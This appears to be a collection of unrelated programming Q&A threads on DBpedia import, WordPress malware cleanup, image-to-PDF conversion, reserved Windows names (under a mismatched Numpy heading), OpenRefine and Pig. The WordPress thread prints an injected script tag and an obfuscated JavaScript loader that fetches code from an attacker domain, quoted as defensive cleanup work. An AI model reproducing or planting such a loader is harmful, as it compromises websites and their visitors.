How to import DBpedia into Neo4j?

I need to import DBpedia into Neo4j.
I downloaded DBpedia from here: http://wiki.dbpedia.org/Downloads37
Any ideas?

I am currently doing the same thing. I found that the biggest problem is indexing, so the best approach is to write a Java program that extracts the statements, together with MD5 hashes, into a triples file with the following layout:
subjectHash \t predicateHash \t objectHash \t subject \t predicate \t object \n
In another file you will need to store the nodes (i.e. the subjects and objects of the statements):
nodeHash \t nodeValue
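For illustration only, here is a minimal bash sketch of how one such hashed line could be produced (this is not the Java program from the repo below; the example triple and the helper h are made up):
# hash a made-up subject/predicate/object with md5sum and emit one tab-separated line
s='http://dbpedia.org/resource/Berlin'
p='http://dbpedia.org/ontology/country'
o='http://dbpedia.org/resource/Germany'
h() { printf '%s' "$1" | md5sum | cut -d' ' -f1; }
printf '%s\t%s\t%s\t%s\t%s\t%s\n' "$(h "$s")" "$(h "$p")" "$(h "$o")" "$s" "$p" "$o"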
The code for this procedure can be downloaded from my GitHub:
https://github.com/eschleining/DbPediaImport.git
Compile it with mvn package; this creates a jar file in target that takes the gzipped DBpedia files as arguments. If you only have the bz2 files, you can convert them as follows:
for i in *.bz2 ; do bzcat "$i" | gzip > "${i%.bz2}.gz"; done &
Now run:
java -jar ConcurrentDataTableWriter-0.0.1-SNAPSHOT.jar yourdbpediaFolder/*.gz
Then sort the newly created files with the Linux sort utility:
gunzip -c nodes.gz | sort -k2 -u | gzip > nodes_unique.gz
And the triples file:
gunzip -c triples.gz | sort -k1,3 -u | gzip > triples_unique.gz
Now you can compile the batch inserter from my repo with Maven 3 (mvn package) and run it in the same directory as the nodes_unique.gz and triples_unique.gz files. It creates a Neo4j database directory named "DbpediaNe04J" (mind the typo: "0" instead of "o").
I found this to be the fastest way, since it only looks up the index once for each subject/object pair of a triple.
Feel free to add datatype nodes as properties and so on. I have currently implemented each triple as a relationship between two nodes.


Remove malware line of text from multiple files in Linux

Recently I noticed that all my WP sites have had malware injected into all the index.php files. I have identified the problem and patched it; however, I cannot delete the malware lines from the files. I tried this command:
find . -name "*.php" -exec sed -i 's/<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>><//' {} \;
but I get this error:
find: missing argument to `-exec'
so I guess I have a syntax error. Can you please tell me the exact command to delete this line from all files:
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
This is the line I used; I had the same problem this morning.
grep -rl "<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"
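If all the escaped slashes get unwieldy, note that sed accepts any delimiter character; here is a sketch of the same cleanup using | instead of / (assumes GNU sed for in-place editing with -i):
# same substitution, with | as the sed delimiter so the URL's slashes need no escaping
grep -rl 'scripts.trasnaltemyrecords.com' . | xargs sed -i "s|<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>||g"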
Check if the plugin "super-socialat" exists and delete it; this is malware too. We found this plugin on all sites with this **** malware.
And please check whether adminer.php has been uploaded to your server. It seems they are using Adminer to hack the sites:
https://sansec.io/labs/2019/01/17/adminer-4.6.2-file-disclosure-vulnerability/
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
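A quick way to check for dropped Adminer copies (a one-liner; run it from the web root):
# list any Adminer files that might have been uploaded anywhere under the current directory
find . -type f -iname 'adminer*.php'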
I encountered the same problem.
The script is not in a file; it's in the database.
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
Use the Better Search Replace plugin to replace it with an empty string.
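If you prefer the command line over a plugin, WP-CLI's search-replace command can do the same against the database (a sketch; assumes WP-CLI is installed, run it from the WordPress root, and preview with --dry-run before applying):
# preview removal of the injected tag from all tables; drop --dry-run to apply
wp search-replace "<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>" "" --all-tables --dry-run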
The JS files are also affected.
I ran find . -type f -mtime -1
and found this code prepended to all my .js files:
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script');
s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
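To verify where such an obfuscated loader points, the character codes can be decoded in the shell; a quick sketch assuming GNU awk, with the codes copied from the snippet above:
# decode the String.fromCharCode payload to reveal the fetched URL
codes='104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48'
echo "$codes" | tr ',' '\n' | awk '{printf "%c", $1}'; echo
# prints: https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=060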
WordPress's temp-crawl.php causes the issue.
I have WP and native PHP sites on the server. The suspicious files are index.*; they contain the script line mentioned above, and every .js file is infected as well.
There is also a file in the root directory, wp-craft-report-conf.php, that must be deleted.
After that everything seems to work, at least for now.
I have the same problem.
I added 127.0.0.1 trasnaltemyrecords.com to /etc/hosts.
grep -rl 'scripts.trasnaltemyrecords.com' . > file_with_scripts.txt
With this script I remove the injection:
$txt_file = file_get_contents('file_with_scripts.txt');
$rows = explode("\n", $txt_file);
array_shift($rows);
foreach ($rows as $row => $data)
{
    $filename = trim($data);
    // skip blank lines and anything that is not a regular file
    if ($filename === '' || !is_file($filename)) {
        continue;
    }
    $contents = file_get_contents($filename);
    // strip the injected <script>...</script> tag from the start of the file
    $new_content = preg_replace('/^<script(.*?)script>/i', '', $contents);
    // write the cleaned content back instead of only echoing it
    file_put_contents($filename, $new_content);
}
Check your database if you use ACF.
Also check this topic on WordPress.org:
https://wordpress.org/support/topic/malware-found-injected-script/

Batch conversion of jpg to pdf

I have a huge number of jpeg files, each being a photo of a page from a historical document. Now I want to batch-create pdf files out of these, preferably turning the files that represent one document into a separate pdf file, with the pages in the correct order. Filenames are constructed like this: "date y p id optional.jpg", where y is a running number if several documents share the same date, p is the page number, id is the number of the photo from the camera, and optional, which is only sometimes present, contains extra info about the document. All pieces are separated by a space.
I was hoping to use the built-in Microsoft PDF writer, but I have not found a command-line interface for it. I can of course generate a script from the directory listing, if only I knew the command-line interface of an application to write the script for. A bonus would be if each page of the created pdf file could contain parts of the filename.
If you aren't against a Python script, there is an image-to-pdf library known as img2pdf. The PyPI link can be found here, and I would be happy to do up a quick script for you.
EDIT:
A tutorial can be found here
EDIT 2:
This should do it:
## Import libraries ##
import img2pdf, os
from PIL import Image
# source dir of jpgs and destination dir for the pdfs
dirofjpgs = "PUT DIRECTORY HERE" # formatting is C:\\User not C:\User\
pathforpdfs = "PUT DIRECTORY HERE"
# change to the working dir
os.chdir(dirofjpgs)
NameOfFiles = []
# an empty list to store the names of files
ExtOfFiles = []
# an empty list to store the extensions of files
self_file = os.path.basename(__file__)
for entry in os.listdir(os.curdir): # for every item in the current dir
    name, ext = os.path.splitext(entry)
    if ext != ".ini" and entry != self_file: # skip Windows .ini files and this script itself
        NameOfFiles.append(name) # add the name of the file to the NameOfFiles list
        ExtOfFiles.append(ext) # add the extension of the file to the ExtOfFiles list
# for every item in the NameOfFiles list
for i in range(len(NameOfFiles)):
    # open the image with Pillow (the import comes from PIL, not "Pillow")
    image = Image.open(NameOfFiles[i] + ExtOfFiles[i])
    # convert with img2pdf
    pdf_values = img2pdf.convert(image.filename)
    # save as its own pdf in the output dir
    file = open(os.path.join(pathforpdfs, NameOfFiles[i] + ".pdf"), "wb")
    file.write(pdf_values)
    # close
    image.close()
    file.close()
    print(str(i + 1), "/", len(NameOfFiles))
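As an alternative to the Python route, img2pdf also ships a command-line tool, so the grouping into one pdf per document can be sketched directly in the shell (untested sketch; it assumes the "date y p id optional.jpg" naming with space-separated fields, GNU tools, and img2pdf installed via pip):
# one pdf per document: group on the "date y" prefix, order pages by field 3 (the page number p)
ls *.jpg | awk '{print $1, $2}' | sort -u |
while read -r date y; do
  ls "$date $y "*.jpg | sort -t' ' -k3,3n | tr '\n' '\0' | xargs -0 img2pdf -o "$date $y.pdf"
done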

Numpy cannot save with certain name(s)

Why can't you name a folder 'con' in Windows?
Whenever I try to name a folder "con" (without the quotes), it reverts to its original name.
Why does it do this?
Back in the MS-DOS days, "con" had a special meaning. It referred to the console and allowed you to treat it like any other file. For example, you might create a new text file by typing copy con new.txt. Then you could enter your text and hit ^Z when finished.
The thing is, you can still do that. Therefore, as far as the file system is concerned, there is already an object out there named con. There are other reserved names as well, but I see that, while I was typing this, those names have already been provided in other answers.
Do not use the following reserved device names for the name of a file:
CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9
Source: MSDN
Other names, such as drive names, cannot be used either:
CLOCK$, A:-Z:
Source: Microsoft support
Actually, you can create a folder named con.
Use this in the command prompt; it creates a folder named con on your C: drive:
md \\.\C:\con
To remove this folder, use this in the command prompt:
rd /s \\.\C:\con
And just for those that are wondering "so why would you?" - my name is CON and if I wish to use that as my folder I WILL so "bugger you MS"
Con "OzDing"
This dates back to MS-DOS. Reading or writing a file named "CON:" read from or wrote to the console. I imagine Windows still supports this for backwards compatibility.
From Microsoft TechNet:
Several special file names are reserved by the system and cannot be used for files or folders:
CON, AUX, COM1, COM2, COM3, COM4,
LPT1, LPT2, LPT3, PRN, NUL

Batch edit in OpenRefine

So, I have a bunch of .csv files which need cleaning. They all need to go through the same steps, so I've extracted OpenRefine's operation history in order to apply it to the other ones.
I could open each file one by one in OpenRefine and apply the extracted JSON history. But there are a lot of files...
Also, I don't have enough memory to open them all at once in OpenRefine (by multi-selecting when opening the files).
Is there any way I could edit them all at once, or automatically, using that JSON I extracted from OpenRefine?
That's what we created BatchRefine for; the README should be pretty much self-explanatory. If not, let me know.
I just recently converted 4 million CSV records to RDF using BatchRefine; it took less than 10 minutes on my MacBook Pro.
I execute BatchRefine with this simple shell script:
#!/bin/bash
for file in ./input/*.tsv
do
filename=$(basename "$file")
if [ ! -f "target/${filename}-transformed" ]
then
echo "Processing $filename..."
curl -XPOST -H 'Accept: text/turtle' -H 'Content-Type: text/csv' --data-binary "@$file" -o "target/${filename}-transformed" 'localhost:8310/?refinejson=http://localhost:8000/bar-config.json'
else
echo "Found target/${filename}-transformed, skipping $file"
fi
done;
Note that you need to adjust the Accept header in the script; I guess you want CSV as output again, not RDF.
You can automate some OpenRefine operations using one of the existing libraries:
python
another python library
ruby
javascript - nodejs

Apache pig load multiple files

I have the following folder structure containing my content, all adhering to the same schema:
/project/20160101/part-v121
/project/20160105/part-v121
/project/20160102/part-v121
/project/20170104/part-v121
I have implemented a Pig script which uses JsonLoader to load and process individual files. However, I need to make it generic so it reads all the files under the dated folders.
Right now I have managed to extract the file paths using the following:
hdfs dfs -ls hdfs://local:8080/project/20* > /tmp/ei.txt
cat /tmp/ei.txt | awk '{print $NF}' | grep part > /tmp/res.txt
Now I need to know how to pass this list to the Pig script so that my program runs on all the files.
We can use a glob path in the LOAD statement.
In your case the statement below should help; let me know if you face any issues.
A = LOAD 'hdfs://local:8080/project/20160102/*' USING JsonLoader();
This assumes a .pig_schema file (produced by JsonStorage) is present in the input directory.
Ref: https://pig.apache.org/docs/r0.10.0/func.html#jsonloadstore
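To cover every dated folder in one run, you can widen the glob and pass it in as a parameter so the script itself stays generic; a sketch (the script name process.pig and the parameter name INPUT are placeholders of mine):
# inside process.pig: A = LOAD '$INPUT' USING JsonLoader();
pig -param INPUT='hdfs://local:8080/project/20*/part-v121' process.pig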